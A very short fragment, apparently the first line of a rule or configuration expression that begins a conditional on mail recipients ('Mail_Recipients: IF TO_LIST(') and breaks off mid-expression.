1 Mail_Recipients: IF TO_LIST(